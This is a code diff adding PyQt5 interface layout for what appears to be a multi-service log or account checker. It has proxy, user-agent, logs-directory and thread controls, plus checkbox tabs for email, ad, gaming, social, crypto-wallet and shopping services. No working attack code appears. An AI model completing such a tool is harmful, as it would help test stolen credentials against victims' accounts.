self.lineEdit_proxy.setObjectName("lineEdit_proxy") + self.lineEdit_ua = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_ua.setGeometry(QtCore.QRect(10, 360, 331, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_ua.setFont(font) + self.lineEdit_ua.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.lineEdit_ua.setObjectName("lineEdit_ua") + self.checkBox_ua = QtWidgets.QCheckBox(self.centralwidget) + self.checkBox_ua.setGeometry(QtCore.QRect(440, 360, 81, 31)) + font = QtGui.QFont() + font.setFamily("MS Shell Dlg 2") + font.setPointSize(9) + font.setBold(True) + self.checkBox_ua.setFont(font) + self.checkBox_ua.setStyleSheet("color: #c8c8c8") + self.checkBox_ua.setObjectName("checkBox_ua") + self.label_2 = QtWidgets.QLabel(self.centralwidget) + self.label_2.setGeometry(QtCore.QRect(10, 740, 601, 51)) + self.label_2.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.label_2.setText("") + self.label_2.setObjectName("label_2") + self.pushButton = QtWidgets.QPushButton(self.centralwidget) + self.pushButton.setGeometry(QtCore.QRect(620, 740, 171, 51)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(12) + self.pushButton.setFont(font) + self.pushButton.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.pushButton.setObjectName("pushButton") + self.progressBar = QtWidgets.QProgressBar(self.centralwidget) + self.progressBar.setGeometry(QtCore.QRect(180, 750, 421, 31)) + self.progressBar.setStyleSheet("background-color: #181818;\n" +"border: 3px solid #363636;\n" +"color: #c8c8c8") + self.progressBar.setProperty("value", 24) + self.progressBar.setTextVisible(False) + self.progressBar.setOrientation(QtCore.Qt.Horizontal) + self.progressBar.setInvertedAppearance(False) + self.progressBar.setObjectName("progressBar") + self.pushButton_dir_logs = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_dir_logs.setGeometry(QtCore.QRect(430, 280, 91, 31)) + self.pushButton_dir_logs.setStyleSheet("") + self.pushButton_dir_logs.setObjectName("pushButton_dir_logs") + self.pushButton_proxies_files = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_proxies_files.setGeometry(QtCore.QRect(340, 320, 91, 31)) + self.pushButton_proxies_files.setStyleSheet("") + self.pushButton_proxies_files.setObjectName("pushButton_proxies_files") + self.pushButton_useragents_file = QtWidgets.QPushButton(self.centralwidget) + self.pushButton_useragents_file.setGeometry(QtCore.QRect(340, 360, 91, 31)) + self.pushButton_useragents_file.setStyleSheet("") + self.pushButton_useragents_file.setObjectName("pushButton_useragents_file") + self.textEdit_console = QtWidgets.QTextEdit(self.centralwidget) + self.textEdit_console.setGeometry(QtCore.QRect(10, 20, 781, 251)) + self.textEdit_console.setStyleSheet("background-color: #181818;\n" +"border: 3px solid #363636;\n" +"color: #c8c8c8") + self.textEdit_console.setObjectName("textEdit_console") + self.social_network_label = QtWidgets.QLabel(self.centralwidget) + self.social_network_label.setGeometry(QtCore.QRect(10, 740, 161, 51)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.social_network_label.setFont(font) + self.social_network_label.setStyleSheet("") + self.social_network_label.setObjectName("social_network_label") + self.spinBox_thr = QtWidgets.QSpinBox(self.centralwidget) + self.spinBox_thr.setGeometry(QtCore.QRect(90, 750, 71, 31)) + font = QtGui.QFont() + font.setFamily("Impact") + font.setPointSize(10) + self.spinBox_thr.setFont(font) + self.spinBox_thr.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.spinBox_thr.setObjectName("spinBox_thr") + self.label_lgbt = QtWidgets.QLabel(self.centralwidget) + self.label_lgbt.setGeometry(QtCore.QRect(0, 0, 801, 5)) + self.label_lgbt.setText("") + self.label_lgbt.setScaledContents(True) + self.label_lgbt.setObjectName("label_lgbt") + self.comboBox_proxy = QtWidgets.QComboBox(self.centralwidget) + self.comboBox_proxy.setGeometry(QtCore.QRect(440, 320, 71, 21)) + font = QtGui.QFont() + font.setFamily("MS Sans Serif") + font.setPointSize(10) + self.comboBox_proxy.setFont(font) + self.comboBox_proxy.setStyleSheet("") + self.comboBox_proxy.setObjectName("comboBox_proxy") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.comboBox_proxy.addItem("") + self.stats_box = QtWidgets.QLabel(self.centralwidget) + self.stats_box.setGeometry(QtCore.QRect(530, 280, 261, 131)) + font = QtGui.QFont() + font.setFamily("Impact") + font.setPointSize(12) + self.stats_box.setFont(font) + self.stats_box.setStyleSheet("") + self.stats_box.setText("") + self.stats_box.setObjectName("stats_box") + self.inbox_tab_widget = QtWidgets.QTabWidget(self.centralwidget) + self.inbox_tab_widget.setGeometry(QtCore.QRect(10, 430, 781, 281)) + font = QtGui.QFont() + font.setFamily("Furore") + self.inbox_tab_widget.setFont(font) + self.inbox_tab_widget.setFocusPolicy(QtCore.Qt.TabFocus) + self.inbox_tab_widget.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu) + self.inbox_tab_widget.setAutoFillBackground(False) + self.inbox_tab_widget.setStyleSheet("QTabWidget::pane { /* The tab widget frame */\n" +" border-top: 2px solid #000000;\n" +" position: absolute;\n" +" top: -0.5em;\n" +"}\n" +"\n" +"QTabWidget::tab-bar {\n" +" alignment: center;\n" +"}\n" +"\n" +"/* Style the tab using the tab sub-control. Note that\n" +" it reads QTabBar _not_ QTabWidget */\n" +"QTabBar::tab {\n" +" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" +" stop: 0 #000000, stop: 0.4 #000000,\n" +" stop: 0.5 #000000, stop: 1.0 #000000);\n" +" border: 2px solid ;\n" +" selection-color: rgb(15, 255, 167);\n" +" border-bottom-color: #000000; /* same as the pane color */\n" +" border-top-left-radius: 12px;\n" +" border-top-right-radius: 12px;\n" +" min-width: 8ex;\n" +" padding: 8px;\n" +"}\n" +"\n" +"QTabBar::tab:selected, QTabBar::tab:hover {\n" +" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" +" stop: 0 #000000, stop: 0.4 #000000,\n" +" stop: 0.5 #000000, stop: 1.0 #000000);\n" +"}\n" +"\n" +"QTabBar::tab:selected {\n" +" border-color: #00def2;\n" +" border-bottom-color: #00def2; /* same as pane color */\n" +"}") + self.inbox_tab_widget.setTabPosition(QtWidgets.QTabWidget.North) + self.inbox_tab_widget.setTabShape(QtWidgets.QTabWidget.Rounded) + self.inbox_tab_widget.setElideMode(QtCore.Qt.ElideNone) + self.inbox_tab_widget.setMovable(False) + self.inbox_tab_widget.setTabBarAutoHide(False) + self.inbox_tab_widget.setObjectName("inbox_tab_widget") + self.inbox_tab = QtWidgets.QWidget() + self.inbox_tab.setObjectName("inbox_tab") + self.widget = QtWidgets.QWidget(self.inbox_tab) + self.widget.setGeometry(QtCore.QRect(9, 10, 761, 221)) + self.widget.setObjectName("widget") + self.inbox_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget) + self.inbox_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) + self.inbox_checkbox_gridlayout.setObjectName("inbox_checkbox_gridlayout") + self.gmail_inbox_checkbox = QtWidgets.QCheckBox(self.widget) + self.gmail_inbox_checkbox.setEnabled(False) + self.gmail_inbox_checkbox.setObjectName("gmail_inbox_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.gmail_inbox_checkbox, 0, 0, 1, 1) + self.yandex_checkbox = QtWidgets.QCheckBox(self.widget) + self.yandex_checkbox.setEnabled(False) + self.yandex_checkbox.setObjectName("yandex_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.yandex_checkbox, 0, 1, 1, 1) + self.yahoo_checkbox = QtWidgets.QCheckBox(self.widget) + self.yahoo_checkbox.setEnabled(False) + self.yahoo_checkbox.setObjectName("yahoo_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.yahoo_checkbox, 1, 0, 1, 1) + self.outlook_checkbox = QtWidgets.QCheckBox(self.widget) + self.outlook_checkbox.setEnabled(False) + self.outlook_checkbox.setObjectName("outlook_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.outlook_checkbox, 1, 1, 1, 1) + self.webmail_checkbox = QtWidgets.QCheckBox(self.widget) + self.webmail_checkbox.setEnabled(False) + self.webmail_checkbox.setObjectName("webmail_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.webmail_checkbox, 2, 0, 1, 1) + self.mailru_checkbox = QtWidgets.QCheckBox(self.widget) + self.mailru_checkbox.setEnabled(False) + self.mailru_checkbox.setObjectName("mailru_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.mailru_checkbox, 2, 1, 1, 1) + self.cpanel_checkbox = QtWidgets.QCheckBox(self.widget) + self.cpanel_checkbox.setEnabled(False) + self.cpanel_checkbox.setObjectName("cpanel_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.cpanel_checkbox, 3, 0, 1, 1) + self.office_checkbox = QtWidgets.QCheckBox(self.widget) + self.office_checkbox.setEnabled(False) + self.office_checkbox.setObjectName("office_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.office_checkbox, 3, 1, 1, 1) + self.inbox_tab_widget.addTab(self.inbox_tab, "") + self.ads_tab = QtWidgets.QWidget() + self.ads_tab.setObjectName("ads_tab") + self.widget1 = QtWidgets.QWidget(self.ads_tab) + self.widget1.setGeometry(QtCore.QRect(10, 10, 761, 211)) + self.widget1.setObjectName("widget1") + self.gridLayout_3 = QtWidgets.QGridLayout(self.widget1) + self.gridLayout_3.setContentsMargins(0, 0, 0, 0) + self.gridLayout_3.setObjectName("gridLayout_3") + self.bing_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.bing_ads_checkbox.setEnabled(False) + self.bing_ads_checkbox.setObjectName("bing_ads_checkbox") + self.gridLayout_3.addWidget(self.bing_ads_checkbox, 0, 0, 1, 1) + self.reddit_ads__checkbox = QtWidgets.QCheckBox(self.widget1) + self.reddit_ads__checkbox.setEnabled(False) + self.reddit_ads__checkbox.setObjectName("reddit_ads__checkbox") + self.gridLayout_3.addWidget(self.reddit_ads__checkbox, 0, 1, 1, 1) + self.ahref_checkbox = QtWidgets.QCheckBox(self.widget1) + self.ahref_checkbox.setEnabled(False) + self.ahref_checkbox.setObjectName("ahref_checkbox") + self.gridLayout_3.addWidget(self.ahref_checkbox, 0, 2, 1, 1) + self.snapchat_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.snapchat_ads_checkbox.setEnabled(False) + self.snapchat_ads_checkbox.setObjectName("snapchat_ads_checkbox") + self.gridLayout_3.addWidget(self.snapchat_ads_checkbox, 1, 0, 1, 1) + self.tinder_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.tinder_ads_checkbox.setEnabled(False) + self.tinder_ads_checkbox.setObjectName("tinder_ads_checkbox") + self.gridLayout_3.addWidget(self.tinder_ads_checkbox, 1, 1, 1, 1) + self.twitter_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.twitter_ads_checkbox.setEnabled(False) + self.twitter_ads_checkbox.setObjectName("twitter_ads_checkbox") + self.gridLayout_3.addWidget(self.twitter_ads_checkbox, 1, 2, 1, 1) + self.sem_rush_checkbox = QtWidgets.QCheckBox(self.widget1) + self.sem_rush_checkbox.setEnabled(False) + self.sem_rush_checkbox.setObjectName("sem_rush_checkbox") + self.gridLayout_3.addWidget(self.sem_rush_checkbox, 2, 0, 1, 1) + self.craigslist_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.craigslist_ads_checkbox.setEnabled(False) + self.craigslist_ads_checkbox.setObjectName("craigslist_ads_checkbox") + self.gridLayout_3.addWidget(self.craigslist_ads_checkbox, 3, 0, 1, 1) + self.facebookads__checkbox = QtWidgets.QCheckBox(self.widget1) + self.facebookads__checkbox.setObjectName("facebookads__checkbox") + self.gridLayout_3.addWidget(self.facebookads__checkbox, 3, 1, 1, 1) + self.microsoft_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.microsoft_ads_checkbox.setEnabled(False) + self.microsoft_ads_checkbox.setObjectName("microsoft_ads_checkbox") + self.gridLayout_3.addWidget(self.microsoft_ads_checkbox, 2, 2, 1, 1) + self.inbox_tab_widget.addTab(self.ads_tab, "") + self.game_tab = QtWidgets.QWidget() + self.game_tab.setObjectName("game_tab") + self.widget2 = QtWidgets.QWidget(self.game_tab) + self.widget2.setGeometry(QtCore.QRect(10, 10, 761, 201)) + self.widget2.setObjectName("widget2") + self.game_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget2) + self.game_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) + self.game_checkbox_gridlayout.setObjectName("game_checkbox_gridlayout") + self.checkBox_steam = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_steam.setFont(font) + self.checkBox_steam.setStyleSheet("") + self.checkBox_steam.setObjectName("checkBox_steam") + self.game_checkbox_gridlayout.addWidget(self.checkBox_steam, 0, 0, 1, 1) + self.checkBox_pathofexile = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_pathofexile.setFont(font) + self.checkBox_pathofexile.setStyleSheet("") + self.checkBox_pathofexile.setObjectName("checkBox_pathofexile") + self.game_checkbox_gridlayout.addWidget(self.checkBox_pathofexile, 0, 1, 1, 1) + self.checkBox_roblox = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_roblox.setFont(font) + self.checkBox_roblox.setStyleSheet("") + self.checkBox_roblox.setObjectName("checkBox_roblox") + self.game_checkbox_gridlayout.addWidget(self.checkBox_roblox, 1, 0, 1, 1) + self.checkBox_battlenet = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_battlenet.setFont(font) + self.checkBox_battlenet.setStyleSheet("") + self.checkBox_battlenet.setObjectName("checkBox_battlenet") + self.game_checkbox_gridlayout.addWidget(self.checkBox_battlenet, 2, 0, 1, 1) + self.inbox_tab_widget.addTab(self.game_tab, "") + self.social_network_tab = QtWidgets.QWidget() + self.social_network_tab.setObjectName("social_network_tab") + self.layoutWidget = QtWidgets.QWidget(self.social_network_tab) + self.layoutWidget.setGeometry(QtCore.QRect(10, 10, 761, 231)) + self.layoutWidget.setObjectName("layoutWidget") + self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget) + self.gridLayout.setContentsMargins(0, 0, 0, 0) + self.gridLayout.setObjectName("gridLayout") + self.checkBox_instagram = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_instagram.setFont(font) + self.checkBox_instagram.setStyleSheet("") + self.checkBox_instagram.setObjectName("checkBox_instagram") + self.gridLayout.addWidget(self.checkBox_instagram, 0, 0, 1, 1) + self.myspace_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.myspace_checkbox.setEnabled(False) + font = QtGui.QFont() + font.setFamily("Arial") + self.myspace_checkbox.setFont(font) + self.myspace_checkbox.setObjectName("myspace_checkbox") + self.gridLayout.addWidget(self.myspace_checkbox, 2, 2, 1, 1) + self.reddit_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.reddit_checkbox.setEnabled(False) + self.reddit_checkbox.setObjectName("reddit_checkbox") + self.gridLayout.addWidget(self.reddit_checkbox, 1, 2, 1, 1) + self.checkBox_discord = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_discord.setFont(font) + self.checkBox_discord.setStyleSheet("") + self.checkBox_discord.setObjectName("checkBox_discord") + self.gridLayout.addWidget(self.checkBox_discord, 2, 1, 1, 1) + self.kick_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.kick_checkbox.setObjectName("kick_checkbox") + self.gridLayout.addWidget(self.kick_checkbox, 5, 0, 1, 1) + self.checkBox_facebook_ads = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_facebook_ads.setFont(font) + self.checkBox_facebook_ads.setStyleSheet("") + self.checkBox_facebook_ads.setObjectName("checkBox_facebook_ads") + self.gridLayout.addWidget(self.checkBox_facebook_ads, 0, 2, 1, 1) + self.checkBox_tiktok = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_tiktok.setFont(font) + self.checkBox_tiktok.setStyleSheet("") + self.checkBox_tiktok.setObjectName("checkBox_tiktok") + self.gridLayout.addWidget(self.checkBox_tiktok, 2, 0, 1, 1) + self.pintrest_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.pintrest_checkbox.setEnabled(False) + self.pintrest_checkbox.setObjectName("pintrest_checkbox") + self.gridLayout.addWidget(self.pintrest_checkbox, 1, 0, 1, 1) + self.checkBox_youtube = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_youtube.setFont(font) + self.checkBox_youtube.setStyleSheet("") + self.checkBox_youtube.setObjectName("checkBox_youtube") + self.gridLayout.addWidget(self.checkBox_youtube, 0, 1, 1, 1) + self.vimeo_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.vimeo_checkbox.setObjectName("vimeo_checkbox") + self.gridLayout.addWidget(self.vimeo_checkbox, 5, 1, 1, 1) + self.rumble_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.rumble_checkbox.setEnabled(False) + self.rumble_checkbox.setObjectName("rumble_checkbox") + self.gridLayout.addWidget(self.rumble_checkbox, 5, 2, 1, 1) + self.localsapp_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.localsapp_checkbox.setEnabled(False) + self.localsapp_checkbox.setObjectName("localsapp_checkbox") + self.gridLayout.addWidget(self.localsapp_checkbox, 5, 3, 1, 1) + self.snapchat_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.snapchat_checkbox.setEnabled(False) + self.snapchat_checkbox.setObjectName("snapchat_checkbox") + self.gridLayout.addWidget(self.snapchat_checkbox, 1, 3, 1, 1) + self.patreon_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.patreon_checkbox.setEnabled(False) + self.patreon_checkbox.setObjectName("patreon_checkbox") + self.gridLayout.addWidget(self.patreon_checkbox, 5, 4, 1, 1) + self.checkBox_netflix = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_netflix.setFont(font) + self.checkBox_netflix.setStyleSheet("") + self.checkBox_netflix.setObjectName("checkBox_netflix") + self.gridLayout.addWidget(self.checkBox_netflix, 1, 1, 1, 1) + self.checkBox_vk = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_vk.setFont(font) + self.checkBox_vk.setStyleSheet("") + self.checkBox_vk.setObjectName("checkBox_vk") + self.gridLayout.addWidget(self.checkBox_vk, 1, 4, 1, 1) + self.twitch_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.twitch_checkbox.setEnabled(False) + self.twitch_checkbox.setObjectName("twitch_checkbox") + self.gridLayout.addWidget(self.twitch_checkbox, 0, 3, 1, 1) + self.linkedin_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.linkedin_checkbox.setEnabled(False) + self.linkedin_checkbox.setObjectName("linkedin_checkbox") + self.gridLayout.addWidget(self.linkedin_checkbox, 2, 3, 1, 1) + self.inbox_tab_widget.addTab(self.social_network_tab, "") + self.crypto_wallets_tab = QtWidgets.QWidget() + self.crypto_wallets_tab.setObjectName("crypto_wallets_tab") + self.widget3 = QtWidgets.QWidget(self.crypto_wallets_tab) + self.widget3.setGeometry(QtCore.QRect(10, 10, 761, 221)) + self.widget3.setObjectName("widget3") + self.gridLayout_6 = QtWidgets.QGridLayout(self.widget3) + self.gridLayout_6.setContentsMargins(0, 0, 0, 0) + self.gridLayout_6.setObjectName("gridLayout_6") + self.checkBox_coinbase = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_coinbase.setFont(font) + self.checkBox_coinbase.setStyleSheet("") + self.checkBox_coinbase.setObjectName("checkBox_coinbase") + self.gridLayout_6.addWidget(self.checkBox_coinbase, 0, 0, 1, 1) + self.checkBox_kryptex = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_kryptex.setFont(font) + self.checkBox_kryptex.setStyleSheet("") + self.checkBox_kryptex.setObjectName("checkBox_kryptex") + self.gridLayout_6.addWidget(self.checkBox_kryptex, 0, 1, 1, 1) + self.checkBox_hitbtc = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_hitbtc.setFont(font) + self.checkBox_hitbtc.setStyleSheet("") + self.checkBox_hitbtc.setObjectName("checkBox_hitbtc") + self.gridLayout_6.addWidget(self.checkBox_hitbtc, 1, 0, 1, 1) + self.checkBox_freebitcoin = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_freebitcoin.setFont(font) + self.checkBox_freebitcoin.setStyleSheet("") + self.checkBox_freebitcoin.setObjectName("checkBox_freebitcoin") + self.gridLayout_6.addWidget(self.checkBox_freebitcoin, 2, 0, 1, 1) + self.inbox_tab_widget.addTab(self.crypto_wallets_tab, "") + self.shopping_tab = QtWidgets.QWidget() + self.shopping_tab.setObjectName("shopping_tab") + self.layoutWidget1 = QtWidgets.QWidget(self.shopping_tab) + self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 731, 211)) + self.layoutWidget1.setObjectName("layoutWidget1") + self.gridLayout_2 = QtWidgets.QGridLayout(self.layoutWidget1) + self.gridLayout_2.setContentsMargins(0, 0, 0, 0) + self.gridLayout_2.setObjectName("gridLayout_2") + self.checkBox_amazon = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_amazon.setFont(font) + self.checkBox_amazon.setStyleSheet("") + self.checkBox_amazon.setObjectName("checkBox_amazon") + self.gridLayout_2.addWidget(self.checkBox_amazon, 0, 0, 1, 1) + self.ebay_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.ebay_checkbox.setEnabled(False) + self.ebay_checkbox.setObjectName("ebay_checkbox") + self.gridLayout_2.addWidget(self.ebay_checkbox, 0, 1, 1, 1) + self.airbnb_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.airbnb_checkbox.setEnabled(False) + self.airbnb_checkbox.setObjectName("airbnb_checkbox") + self.gridLayout_2.addWidget(self.airbnb_checkbox, 0, 2, 1, 1) + self.envato_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.envato_checkbox.setEnabled(False) + self.envato_checkbox.setObjectName("envato_checkbox") + self.gridLayout_2.addWidget(self.envato_checkbox, 0, 3, 1, 1) + self.flipkart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.flipkart_checkbox.setEnabled(False) + self.flipkart_checkbox.setObjectName("flipkart_checkbox") + self.gridLayout_2.addWidget(self.flipkart_checkbox, 0, 4, 1, 1) + self.checkBox_funpay = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_funpay.setFont(font) + self.checkBox_funpay.setStyleSheet("") + self.checkBox_funpay.setObjectName("checkBox_funpay") + self.gridLayout_2.addWidget(self.checkBox_funpay, 1, 0, 1, 1) + self.kleinanzeigen_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.kleinanzeigen_checkbox.setEnabled(False) + self.kleinanzeigen_checkbox.setObjectName("kleinanzeigen_checkbox") + self.gridLayout_2.addWidget(self.kleinanzeigen_checkbox, 1, 1, 1, 1) + self.booking_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.booking_checkbox.setEnabled(False) + self.booking_checkbox.setObjectName("booking_checkbox") + self.gridLayout_2.addWidget(self.booking_checkbox, 1, 2, 1, 1) + self.uber_eats_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.uber_eats_checkbox.setEnabled(False) + self.uber_eats_checkbox.setObjectName("uber_eats_checkbox") + self.gridLayout_2.addWidget(self.uber_eats_checkbox, 1, 3, 1, 1) + self.dh_gate_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.dh_gate_checkbox.setEnabled(False) + self.dh_gate_checkbox.setObjectName("dh_gate_checkbox") + self.gridLayout_2.addWidget(self.dh_gate_checkbox, 1, 4, 1, 1) + self.checkBox_humble = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_humble.setFont(font) + self.checkBox_humble.setStyleSheet("") + self.checkBox_humble.setObjectName("checkBox_humble") + self.gridLayout_2.addWidget(self.checkBox_humble, 2, 0, 1, 1) + self.temu_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.temu_checkbox.setEnabled(False) + self.temu_checkbox.setObjectName("temu_checkbox") + 